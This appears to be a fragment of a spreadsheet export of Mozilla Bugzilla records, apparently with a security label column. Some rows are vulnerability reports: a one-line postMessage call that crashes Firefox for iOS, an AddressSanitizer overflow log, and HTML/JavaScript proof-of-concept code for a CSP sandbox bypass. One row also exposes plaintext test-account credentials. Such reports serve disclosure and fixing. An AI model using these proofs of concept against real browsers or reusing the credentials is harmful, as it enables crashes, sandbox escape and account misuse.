      <c r="O1148" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1148" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main99+]</t>
        </is>
      </c>
      <c r="Q1148" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1148" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1148" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1148" t="n">
        <v>1</v>
      </c>
      <c r="U1148" t="n">
        <v>0</v>
      </c>
      <c r="V1148" t="n">
        <v>26</v>
      </c>
      <c r="W1148" t="inlineStr">
        <is>
          <t>Created attachment 9251027
bandicam 2021-11-17 03-52-43-478.mp4
Summary: 
------------
I was testing another website during which I came across this vulnerability in Firefox, I confirmed that whether it is happening in any other browser, strangely I found that only Firefox, Developer, and Nightly are crashing. Hence I believe this is a bug at the Mozilla's Firefox end. 
Description: 
--------------
I was testing Atlassian (JIRA) and found that tickets with a really small specific certain data lead firefox to crash immediately, when ctrl+A is pressed over them.
Sharing my Atlassian test a/c creds to quickly validate the issue. Attaching a video POC as well.
Login URL: https://id.atlassian.com/login
Email: aryan_sinha21@bugcrowdninja.com
Password: z4HGd9XEssTy54T
Reproduction Steps: 
-----------------------
I have already created a ticket with data causing the firefox to crash, you can access it by:
1. Once you log in with the creds that I mentioned. Go to- https://aryansinha.atlassian.net/browse/TES-3
2. Scroll down the page, find the table in which I have listed the data along with multiple other tables. Click over that table with listed data and press ctrl+A. Firefox will immediately crash. 
I have tested this in the following FIrefox's browser clients- Firefox, Developer, and Nightly. 
Well honestly I would say I am not sure what led the firefox to crash, it was just the observation. Hence I would request the team to investigate the same at your end.
Thanks!</t>
        </is>
      </c>
      <c r="X1148" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1149">
      <c r="A1149" t="n">
        <v>1795496</v>
      </c>
      <c r="B1149" t="inlineStr">
        <is>
          <t>2022-10-14 16:15:46 -0700</t>
        </is>
      </c>
      <c r="C1149" t="inlineStr">
        <is>
          <t>[iOS] Browser crashes when webkit.messageHandlers.sessionRestoreHelper.postMessage() is called with an empty body</t>
        </is>
      </c>
      <c r="D1149" t="inlineStr">
        <is>
          <t>2024-06-12 05:39:24 -0700</t>
        </is>
      </c>
      <c r="E1149" t="n">
        <v>1</v>
      </c>
      <c r="F1149" t="n">
        <v>1</v>
      </c>
      <c r="G1149" t="n">
        <v>2</v>
      </c>
      <c r="H1149" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1149" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1149" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1149" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1149" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1149" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1149" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1149" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1149" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q1149" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1149" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1149" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1149" t="n">
        <v>1</v>
      </c>
      <c r="U1149" t="n">
        <v>0</v>
      </c>
      <c r="V1149" t="n">
        <v>7</v>
      </c>
      <c r="W1149" t="inlineStr">
        <is>
          <t>Hi!
We at Brave have been reworking JS scripts and WebKit message handlers recently, so I also decided to look at your messageHandlers.
I found that in this line (https://github.com/mozilla-mobile/firefox-ios/blob/466e09a1f07ea080dad026d955e2ef0dd1aa30f0/Client/Frontend/TabContentsScripts/SessionRestoreHelper.swift#L26) you don't check if params["name"] exists, which leads to a full browser crash if a webpage calls postMessage() with an empty body:
webkit.messageHandlers.sessionRestoreHelper.postMessage({})
PoC:
https://stoletheminerals.github.io/SessionRestoreHelper.html
Tested on the latest Firefox version in AppStore and the one compiled from github sources.
I guess a proper fix would be to either add a guard check on params["name"]  or move this message handler to the sandboxed context.
Thanks,
Artem</t>
        </is>
      </c>
      <c r="X1149" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1150">
      <c r="A1150" t="n">
        <v>1420810</v>
      </c>
      <c r="B1150" t="inlineStr">
        <is>
          <t>2017-11-26 22:30:47 -0800</t>
        </is>
      </c>
      <c r="C1150" t="inlineStr">
        <is>
          <t>Record "why" for more syncs</t>
        </is>
      </c>
      <c r="D1150" t="inlineStr">
        <is>
          <t>2017-11-29 02:12:29 -0800</t>
        </is>
      </c>
      <c r="E1150" t="n">
        <v>1</v>
      </c>
      <c r="F1150" t="n">
        <v>1</v>
      </c>
      <c r="G1150" t="n">
        <v>2</v>
      </c>
      <c r="H1150" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1150" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1150" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1150" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1150" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1150" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1150" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1150" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1150" t="inlineStr"/>
      <c r="Q1150" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1150" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1150" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T1150" t="n">
        <v>1</v>
      </c>
      <c r="U1150" t="n">
        <v>0</v>
      </c>
      <c r="V1150" t="n">
        <v>7</v>
      </c>
      <c r="W1150" t="inlineStr">
        <is>
          <t>We are starting to record "why" for some syncs - we should try and do it for all (ok, most) syncs.</t>
        </is>
      </c>
      <c r="X1150" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1151">
      <c r="A1151" t="n">
        <v>958575</v>
      </c>
      <c r="B1151" t="inlineStr">
        <is>
          <t>2014-01-10 08:49:16 -0800</t>
        </is>
      </c>
      <c r="C1151" t="inlineStr">
        <is>
          <t>Google News - Tablet experience in Chrome for Android superior to Firefox for Android</t>
        </is>
      </c>
      <c r="D1151" t="inlineStr">
        <is>
          <t>2024-03-07 12:37:51 -0800</t>
        </is>
      </c>
      <c r="E1151" t="n">
        <v>1</v>
      </c>
      <c r="F1151" t="n">
        <v>1</v>
      </c>
      <c r="G1151" t="n">
        <v>2</v>
      </c>
      <c r="H1151" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1151" t="inlineStr">
        <is>
          <t>Web Compatibility</t>
        </is>
      </c>
      <c r="J1151" t="inlineStr">
        <is>
          <t>Site Reports</t>
        </is>
      </c>
      <c r="K1151" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1151" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1151" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1151" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1151" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1151" t="inlineStr">
        <is>
          <t>[notcontactready] [country-all]</t>
        </is>
      </c>
      <c r="Q1151" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1151" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1151" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1151" t="n">
        <v>1</v>
      </c>
      <c r="U1151" t="n">
        <v>0</v>
      </c>
      <c r="V1151" t="n">
        <v>16</v>
      </c>
      <c r="W1151" t="inlineStr">
        <is>
          <t>Created attachment 8358472
Chrome|Firefox - screenshot comparison
See screenshot.
The experience for tablets in Chrome for Android superior to that currently served (desktop optimized) to Firefox for Android.
We should outreach to Google to determine what is necessary to get a tablet optimized experience for Google News to Firefox for Android</t>
        </is>
      </c>
      <c r="X1151" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1152">
      <c r="A1152" t="n">
        <v>839621</v>
      </c>
      <c r="B1152" t="inlineStr">
        <is>
          <t>2013-02-08 12:38:54 -0800</t>
        </is>
      </c>
      <c r="C1152" t="inlineStr">
        <is>
          <t>qcms_transform_create can return null, and some of the calling code isn't ready for it</t>
        </is>
      </c>
      <c r="D1152" t="inlineStr">
        <is>
          <t>2013-11-25 13:26:25 -0800</t>
        </is>
      </c>
      <c r="E1152" t="n">
        <v>1</v>
      </c>
      <c r="F1152" t="n">
        <v>1</v>
      </c>
      <c r="G1152" t="n">
        <v>3</v>
      </c>
      <c r="H1152" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1152" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1152" t="inlineStr">
        <is>
          <t>Graphics: Color Management</t>
        </is>
      </c>
      <c r="K1152" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1152" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1152" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1152" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1152" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1152" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q1152" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1152" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1152" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1152" t="n">
        <v>1</v>
      </c>
      <c r="U1152" t="n">
        <v>0</v>
      </c>
      <c r="V1152" t="n">
        <v>16</v>
      </c>
      <c r="W1152" t="inlineStr">
        <is>
          <t>When qcms_transform_create fails, like in 722831, a couple of places that call it indirectly through gfxPlatform methods are not ready for it.</t>
        </is>
      </c>
      <c r="X1152" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" t="n">
        <v>1085175</v>
      </c>
      <c r="B1153" t="inlineStr">
        <is>
          <t>2014-10-19 15:57:51 -0700</t>
        </is>
      </c>
      <c r="C1153" t="inlineStr">
        <is>
          <t>Stack-buffer-overflow Write in mozilla::FileBlockCache::Read</t>
        </is>
      </c>
      <c r="D1153" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:50 -0700</t>
        </is>
      </c>
      <c r="E1153" t="n">
        <v>1</v>
      </c>
      <c r="F1153" t="n">
        <v>1</v>
      </c>
      <c r="G1153" t="n">
        <v>3</v>
      </c>
      <c r="H1153" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1153" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1153" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1153" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1153" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1153" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1153" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1153" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1153" t="inlineStr">
        <is>
          <t>[adv-main34+][adv-esr31.3+]</t>
        </is>
      </c>
      <c r="Q1153" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1153" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1153" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T1153" t="n">
        <v>1</v>
      </c>
      <c r="U1153" t="n">
        <v>0</v>
      </c>
      <c r="V1153" t="n">
        <v>31</v>
      </c>
      <c r="W1153" t="inlineStr">
        <is>
          <t>Created attachment 8507575
stackw.zip
==35313==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f042e1930d1 at pc 0x000000454893 bp 0x7f042e192af0 sp 0x7f042e1922b0
WRITE of size 8200 at 0x7f042e1930d1 thread T83 (Media Decode #1)
    #0 0x454892 in __interceptor_read.part.40 /build/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:352
    #1 0x7f0467295fc7 in pt_Read /build/firefox/src/nsprpub/pr/src/pthreads/ptio.c:1287:13
    #2 0x7f0459e1962f in (anonymous namespace)::interposedRead(PRFileDesc*, void*, int) /build/firefox/src/xpcom/build/NSPRInterposer.cpp:58:10
    #3 0x7f045e2b92ec in mozilla::FileBlockCache::Read(long, unsigned char*, int, int*) /build/firefox/src/content/media/FileBlockCache.cpp:146:16
    #4 0x7f045e2d380c in mozilla::MediaCacheStream::Read(char*, unsigned int, unsigned int*) /build/firefox/src/content/media/MediaCache.cpp:672:10
    #5 0x7f045e32395d in mozilla::ChannelMediaResource::Read(char*, unsigned int, unsigned int*)
    #6 0x7f045e4e8875 in mozilla::webm_read(void*, unsigned long, void*)
    #7 0x7f046047b1f6 in ne_peek_element /build/firefox/src/media/libnestegg/src/nestegg.c:551:10
    #8 0x5d8997ddbd0d9e6f (&lt;unknown module&gt;)
Address 0x7f042e1930d1 is located in stack of thread T83 (Media Decode #1) at offset 49 in frame
    #0 0x7f046047b05f in ne_peek_element /build/firefox/src/media/libnestegg/src/nestegg.c:892
  This frame has 2 object(s):
    [32, 33) 'b.i.i1'
    [48, 49) 'b.i.i' &lt;== Memory access at offset 49 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
Thread T83 (Media Decode #1) created by T82 (Media S~hine #1) here:
    #0 0x439cbe in __interceptor_pthread_create _asan_rtl_
    #1 0x7f0467297030 in _PR_CreateThread /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:453:14
    #2 0x7f0467296c5a in PR_CreateThread /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:544:12
    #3 0x7f0459de2805 in nsThread::Init() /build/firefox/src/xpcom/threads/nsThread.cpp:455:19
    #4 0x7f0459de7d94 in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) /build/firefox/src/xpcom/threads/nsThreadManager.cpp:269:17
    #5 0x7f0459de91e0 in nsThreadPool::PutEvent(nsIRunnable*) /build/firefox/src/xpcom/threads/nsThreadPool.cpp:101:3
    #6 0x7f0459deaa0c in nsThreadPool::Dispatch(nsIRunnable*, unsigned int) /build/firefox/src/xpcom/threads/nsThreadPool.cpp:261:5
    #7 0x7f045e3469a4 in mozilla::MediaTaskQueue::DispatchLocked(mozilla::TemporaryRef&lt;nsIRunnable&gt;, mozilla::MediaTaskQueue::DispatchMode) /build/firefox/src/content/media/MediaTaskQueue.cpp:53:17
    #8 0x7f045e30bc08 in mozilla::MediaDecoderStateMachine::EnqueueDecodeMetadataTask() /build/firefox/src/content/media/MediaTaskQueue.cpp:34:10
    #9 0x7f045e31045a in mozilla::MediaDecoderStateMachine::RunStateMachine() /build/firefox/src/content/media/MediaDecoderStateMachine.cpp:2376:14
    #10 0x7f045e364136 in non-virtual thunk to (anonymous namespace)::TimerEvent::Run() /build/firefox/src/content/media/MediaDecoderStateMachineScheduler.cpp:160:10
    #11 0x7f0459dea070 in nsThreadPool::Run() /build/firefox/src/xpcom/threads/nsThreadPool.cpp:220:7
    #12 0x7f0459dea5bc in non-virtual thunk to nsThreadPool::Run()
    #13 0x7f0459de46f6 in nsThread::ProcessNextEvent(bool, bool*) /build/firefox/src/xpcom/threads/nsThread.cpp:830:7
    #14 0x7f0459e3aa66 in NS_ProcessNextEvent(nsIThread*, bool) /build/firefox/src/xpcom/glue/nsThreadUtils.cpp:265:10
    #15 0x7f045a66d29e in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /build/firefox/src/ipc/glue/MessagePump.cpp:368:5
    #16 0x7f045a61c561 in MessageLoop::Run() /build/firefox/src/ipc/chromium/src/base/message_loop.cc:233:3
    #17 0x7f0459de14a6 in nsThread::ThreadFunc(void*) /build/firefox/src/xpcom/threads/nsThread.cpp:350:5
    #18 0x7f046729a4d0 in _pt_root /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:212:5
    #19 0x7f046aa1fe99 in start_thread /build/buildd/eglibc-2.15/nptl/pthread_create.c:308
Thread T82 (Media S~hine #1) created by T0 here:
    #0 0x439cbe in __interceptor_pthread_create _asan_rtl_
    #1 0x7f0467297030 in _PR_CreateThread /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:453:14
    #2 0x7f0467296c5a in PR_CreateThread /build/firefox/src/nsprpub/pr/src/pthreads/ptthread.c:544:12
    #3 0x7f0459de2805 in nsThread::Init() /build/firefox/src/xpcom/threads/nsThread.cpp:455:19
    #4 0x7f0459de7d94 in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) /build/firefox/src/xpcom/threads/nsThreadManager.cpp:269:17
    #5 0x7f0459de91e0 in nsThreadPool::PutEvent(nsIRunnable*) /build/firefox/src/xpcom/threads/nsThreadPool.cpp:101:3
    #6 0x7f0459deaa0c in nsThreadPool::Dispatch(nsIRunnable*, unsigned int) /build/firefox/src/xpcom/threads/nsThreadPool.cpp:261:5
    #7 0x7f045e315989 in mozilla::MediaDecoderStateMachineScheduler::Schedule(long) /build/firefox/src/content/media/MediaDecoderStateMachineScheduler.cpp:129:10
    #8 0x7f045e2e2fde in mozilla::MediaDecoder::InitializeStateMachine(mozilla::MediaDecoder*) /build/firefox/src/content/media/MediaDecoderStateMachine.cpp:3025:10
    #9 0x7f045e14c73d in mozilla::dom::HTMLMediaElement::FinishDecoderSetup(mozilla::MediaDecoder*, mozilla::MediaResource*, nsIStreamListener**, mozilla::MediaDecoder*) /build/firefox/src/content/html/content/src/HTMLMediaElement.cpp:2659:17
    #10 0x7f045e13b388 in mozilla::dom::HTMLMediaElement::InitializeDecoderForChannel(nsIChannel*, nsIStreamListener**) /build/firefox/src/content/html/content/src/HTMLMediaElement.cpp:2607:12
    #11 0x7f045e13a0b3 in mozilla::dom::HTMLMediaElement::MediaLoadListener::OnStartRequest(nsIRequest*, nsISupports*) /build/firefox/src/content/html/content/src/HTMLMediaElement.cpp:349:7
    #12 0x7f045a33ce42 in mozilla::net::nsHttpChannel::CallOnStartRequest() /build/firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:914:14
    #13 0x7f045a348c45 in mozilla::net::nsHttpChannel::ContinueProcessNormal(tag_nsresult) /build/firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:1668:10
    #14 0x7f045a34555a in mozilla::net::nsHttpChannel::ProcessNormal() /build/firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:1603:12
    #15 0x7f045a344a55 in mozilla::net::nsHttpChannel::ProcessResponse() /build/firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:1513:14
    #16 0x7f045a362e4e in mozilla::net::nsHttpChannel::OnStartRequest(nsIRequest*, nsISupports*) /build/firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:5172:20
    #17 0x7f0459f73fb6 in nsInputStreamPump::OnStateStart() /build/firefox/src/netwerk/base/src/nsInputStreamPump.cpp:531:14
    #18 0x7f0459f734c0 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /build/firefox/src/netwerk/base/src/nsInputStreamPump.cpp:433:25
    #19 0x7f0459dac829 in nsInputStreamReadyEvent::Run() /build/firefox/src/xpcom/io/nsStreamUtils.cpp:88:9
    #20 0x7f0459de46f6 in nsThread::ProcessNextEvent(bool, bool*) /build/firefox/src/xpcom/threads/nsThread.cpp:830:7
    #21 0x7f0459e3aa66 in NS_ProcessNextEvent(nsIThread*, bool) /build/firefox/src/xpcom/glue/nsThreadUtils.cpp:265:10
    #22 0x7f045a66c34f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /build/firefox/src/ipc/glue/MessagePump.cpp:99:21
    #23 0x7f045a61c561 in MessageLoop::Run() /build/firefox/src/ipc/chromium/src/base/message_loop.cc:233:3
    #24 0x7f045dbd214f in nsBaseAppShell::Run()
    #25 0x7f04600884f1 in nsAppStartup::Run() /build/firefox/src/toolkit/components/startup/nsAppStartup.cpp:280:19
    #26 0x7f0460169c9e in XREMain::XRE_mainRun() /build/firefox/src/toolkit/xre/nsAppRunner.cpp:4095:10
    #27 0x7f046016ac86 in XREMain::XRE_main(int, char**, nsXREAppData const*) /build/firefox/src/toolkit/xre/nsAppRunner.cpp:4168:8
    #28 0x7f046016bac6 in XRE_main /build/firefox/src/toolkit/xre/nsAppRunner.cpp:4382:16
    #29 0x4bf702 in main /build/firefox/src/browser/app/nsBrowserApp.cpp:287:12
    #30 0x7f0469a5c76c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0fe105c2a5c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe105c2a5d0: f1 f1 f1 f1 04 f3 f3 f3 00 00 00 00 00 00 00 00
  0x0fe105c2a5e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe105c2a5f0: f1 f1 f1 f1 04 f3 f3 f3 00 00 00 00 00 00 00 00
  0x0fe105c2a600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0fe105c2a610: 00 00 00 00 f1 f1 f1 f1 01 f2[01]f3 00 00 00 00
  0x0fe105c2a620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe105c2a630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe105c2a640: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe105c2a650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe105c2a66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ASan internal:           fe
==35313==ABORTING</t>
        </is>
      </c>
      <c r="X1153" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" t="n">
        <v>157210</v>
      </c>
      <c r="B1154" t="inlineStr">
        <is>
          <t>2002-07-12 14:03:31 -0700</t>
        </is>
      </c>
      <c r="C1154" t="inlineStr">
        <is>
          <t>[FIX]renders input #2 like input #1 they have the same value, but different cases</t>
        </is>
      </c>
      <c r="D1154" t="inlineStr">
        <is>
          <t>2019-03-13 06:45:08 -0700</t>
        </is>
      </c>
      <c r="E1154" t="n">
        <v>1</v>
      </c>
      <c r="F1154" t="n">
        <v>1</v>
      </c>
      <c r="G1154" t="n">
        <v>3</v>
      </c>
      <c r="H1154" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1154" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1154" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1154" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1154" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1154" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1154" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1154" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1154" t="inlineStr"/>
      <c r="Q1154" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1154" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1154" t="inlineStr">
        <is>
          <t>mozilla1.3alpha</t>
        </is>
      </c>
      <c r="T1154" t="n">
        <v>1</v>
      </c>
      <c r="U1154" t="n">
        <v>0</v>
      </c>
      <c r="V1154" t="n">
        <v>22</v>
      </c>
      <c r="W1154" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
BuildID:    2002053012
Open this HTML up in Mozilla or Netscape 6.2.  It will render the inputs the 
same (and submit the same value) even though the values differ by case.  Only 
happens if the 2 characters are 8 characters appart.
&lt;html&gt;
&lt;body&gt;
&lt;form name="MainForm"&gt;
&lt;input type="text" name="lower" value="abcdefghabcdefghi"&gt;
&lt;input type="text" name="upper" value="AbcdefghAbcdefghi"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
Reproducible: Always
Steps to Reproduce:
1. Open the HTML (in the description) up in Mozilla or Netscape 6.2
2.
3.
Actual Results:  It will render the inputs the same (and submit the same value) 
even though the values differ by case.  Only happens if the 2 characters are 8 
characters appart.
Expected Results:  It should have shown and submitted the values as 
lower=abcdefghabcdefgh and upper=AbcdefghAbcdefgh</t>
        </is>
      </c>
      <c r="X1154" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" t="n">
        <v>1768537</v>
      </c>
      <c r="B1155" t="inlineStr">
        <is>
          <t>2022-05-09 14:16:11 -0700</t>
        </is>
      </c>
      <c r="C1155" t="inlineStr">
        <is>
          <t>CSP sandbox header without `allow-scripts` can be bypassed via retargeted javascript: URI</t>
        </is>
      </c>
      <c r="D1155" t="inlineStr">
        <is>
          <t>2024-05-30 10:56:19 -0700</t>
        </is>
      </c>
      <c r="E1155" t="n">
        <v>1</v>
      </c>
      <c r="F1155" t="n">
        <v>1</v>
      </c>
      <c r="G1155" t="n">
        <v>3</v>
      </c>
      <c r="H1155" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1155" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1155" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K1155" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1155" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1155" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1155" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1155" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1155" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main102+][adv-esr91.11+]</t>
        </is>
      </c>
      <c r="Q1155" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1155" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1155" t="inlineStr">
        <is>
          <t>103 Branch</t>
        </is>
      </c>
      <c r="T1155" t="n">
        <v>1</v>
      </c>
      <c r="U1155" t="n">
        <v>0</v>
      </c>
      <c r="V1155" t="n">
        <v>29</v>
      </c>
      <c r="W1155" t="inlineStr">
        <is>
          <t>Under a CSP sandbox header directive without `allow-scripts`, the document shouldn't be able to run scripts. However, this can be bypassed using a `javascript:` URI with a suitable (i.e. script-capable, same-origin) target document.
### Proof of concept
`parent.html`:
```html
&lt;iframe src="child.html"&gt;&lt;/iframe&gt;
```
`child.html`:
```html
Content-Security-Policy: sandbox allow-same-origin allow-top-navigation
&lt;noscript&gt;no scripts allowed here&lt;/noscript&gt;
&lt;a href="javascript:alert(`origin=${origin} location=${location}`)" target="_parent"&gt;click me&lt;/a&gt;
```
When the link is clicked, the script runs in the context of `parent.html`. As per `allow-top-navigation`, the child is allowed to *navigate* the parent, but not to execute scripts since its sandbox doesn't `allow-scripts`.
### Details
Since the *target* (`parent.html`) is itself allowed to run scripts, the relevant security check here is the verification that the sandbox flags of the *triggering* context allow scripts, too:
[`nsJSThunk::EvaluateScript() at nsJSProtocolHandler.cpp:238`](https://searchfox.org/mozilla-central/rev/3175fbb2342bfcdd5dcffed21a4c5a29dae1c61c/dom/jsurl/nsJSProtocolHandler.cpp#238)
```cpp
  // Sandboxed document check: javascript: URI execution is disabled in a
  // sandboxed document unless 'allow-scripts' was specified.
  if ((targetDoc &amp;&amp; !targetDoc-&gt;IsScriptEnabled()) ||
      (loadInfo-&gt;GetTriggeringSandboxFlags() &amp; SANDBOXED_SCRIPTS)) {
  ...
```
In the example, `loadInfo-&gt;GetTriggeringSandboxFlags() == 0`, thus the script is allowed.
My understanding is that the triggering sandbox flags are taken from the triggering BC (not the document):
[`nsDocShell::OnLinkClickSync() at nsDocShell.cpp:13004`](https://searchfox.org/mozilla-central/rev/3175fbb2342bfcdd5dcffed21a4c5a29dae1c61c/docshell/base/nsDocShell.cpp#13004)
```cpp
  uint32_t triggeringSandboxFlags = 0;
  if (mBrowsingContext) {
    triggeringSandboxFlags = mBrowsingContext-&gt;GetSandboxFlags();
  }
  ...
  aLoadState-&gt;SetTriggeringSandboxFlags(triggeringSandboxFlags);
  ...
  nsresult rv = InternalLoad(aLoadState);
```
